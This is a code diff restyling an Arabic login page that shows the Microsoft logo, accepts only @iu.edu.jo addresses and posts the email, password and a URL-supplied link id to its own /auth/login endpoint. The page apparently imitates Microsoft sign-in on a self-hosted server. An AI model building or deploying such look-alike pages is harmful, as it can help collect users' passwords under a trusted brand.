--- a/public/login.html
+++ b/public/login.html
@@ -11,6 +11,7 @@
       align-items: center;
       justify-content: center;
       height: 100vh;
+      margin: 0;
     }
     .login-box {
       background: #fff;
@@ -27,15 +28,33 @@
     .login-box h2 {
       margin-bottom: 20px;
       color: #333;
+      font-weight: normal;
     }
     .form-control {
       width: 100%;
-      padding: 10px;
+      padding: 10px 35px 10px 10px;
       margin: 10px 0;
       border: 1px solid #ccc;
       border-radius: 4px;
       text-align: left;
       direction: ltr;
+      font-size: 14px;
+      background-repeat: no-repeat;
+      background-position: 8px center;
+      background-size: 18px;
+    }
+    .form-control.email {
+      background-image: url("https://img.icons8.com/ios-filled/50/000000/email.png");
+    }
+    .form-control.password {
+      background-image: url("https://img.icons8.com/ios-filled/50/000000/key-security.png");
+    }
+    .error {
+      color: #a80000;
+      font-size: 13px;
+      margin: 5px 0;
+      display: none;
+      text-align: right;
     }
     button {
       background: #0067b8;
@@ -50,17 +69,17 @@
     button:hover {
       background: #005a9e;
     }
-    .error-message {
-      background: #fde7e9;
-      color: #a80000;
-      border: 1px solid #d13438;
-      padding: 10px;
-      border-radius: 4px;
-      margin-top: 10px;
-      font-size: 14px;
-      display: none; /* افتراضياً مخفية */
-      text-align: left;
-      direction: rtl;
+    .extra-links {
+      margin-top: 15px;
+      font-size: 13px;
+      text-align: right;
+    }
+    .extra-links a {
+      color: #0067b8;
+      text-decoration: none;
+    }
+    .extra-links a:hover {
+      text-decoration: underline;
     }
   </style>
 </head>
@@ -68,52 +87,39 @@
   <div class="login-box">
     <img src="https://logincdn.msftauth.net/shared/5/images/microsoft_logo.svg" alt="Microsoft Logo">
     <h2>تسجيل الدخول</h2>
-    <form id="loginForm" method="POST">
-      <input type="email" id="email" name="email" class="form-control" placeholder="البريد الإلكتروني" required>
-      <input type="password" id="password" name="password" class="form-control" placeholder="كلمة المرور" required>
+    <form id="loginForm" action="/auth/login" method="POST">
+      <input type="email" name="email" class="form-control email" placeholder="البريد الإلكتروني" required>
+      <div id="emailError" class="error">❌ يجب أن ينتهي البريد بـ @iu.edu.jo</div>
+
+      <input type="password" name="password" class="form-control password" placeholder="كلمة المرور" required>
+      <!-- حقل مخفي لتخزين الرابط المطلوب -->
       <input type="hidden" id="linkId" name="id">
       <button type="submit">تسجيل الدخول</button>
     </form>
-    <div id="errorBox" class="error-message">❌ يجب إدخال بريد ينتهي بـ ‎@iu.edu.jo</div>
+
+    <div class="extra-links">
+      <a href="#">هل نسيت كلمة المرور؟</a>
+    </div>
   </div>
 
   <script>
-    // التقاط linkId من رابط الصفحة (مثل /auth/login?id=xxxx)
+    // قراءة قيمة id من رابط الصفحة وإضافتها للحقل المخفي
     const params = new URLSearchParams(window.location.search);
     const linkId = params.get('id');
     if (linkId) {
       document.getElementById('linkId').value = linkId;
     }
 
-    // معالجة إرسال النموذج
-    const form = document.getElementById('loginForm');
-    form.addEventListener('submit', async (e) => {
-      e.preventDefault(); // منع الإرسال التقليدي
+    // التحقق من البريد
+    document.getElementById('loginForm').addEventListener('submit', function(e) {
+      const emailInput = this.email.value.trim();
+      const errorMsg = document.getElementById('emailError');
 
-      const email = document.getElementById('email').value.trim();
-      const password = document.getElementById('password').value.trim();
-      const id = document.getElementById('linkId').value;
-
-      // تحقق من النطاق
-      if (!email.endsWith('@iu.edu.jo')) {
-        document.getElementById('errorBox').style.display = 'block';
-        return;
-      }
-
-      // إرسال الطلب إلى السيرفر
-      const res = await fetch('/auth/login', {
-        method: 'POST',
-        headers: { 'Content-Type': 'application/json' },
-        body: JSON.stringify({ email, password, id })
-      });
-
-      if (res.redirected) {
-        // إعادة التوجيه للرابط المحمي
-        window.location.href = res.url;
+      if (!emailInput.endsWith('@iu.edu.jo')) {
+        e.preventDefault();
+        errorMsg.style.display = 'block';
       } else {
-        const msg = await res.text();
-        document.getElementById('errorBox').innerText = msg;
-        document.getElementById('errorBox').style.display = 'block';
+        errorMsg.style.display = 'none';
       }
     });
   </script>
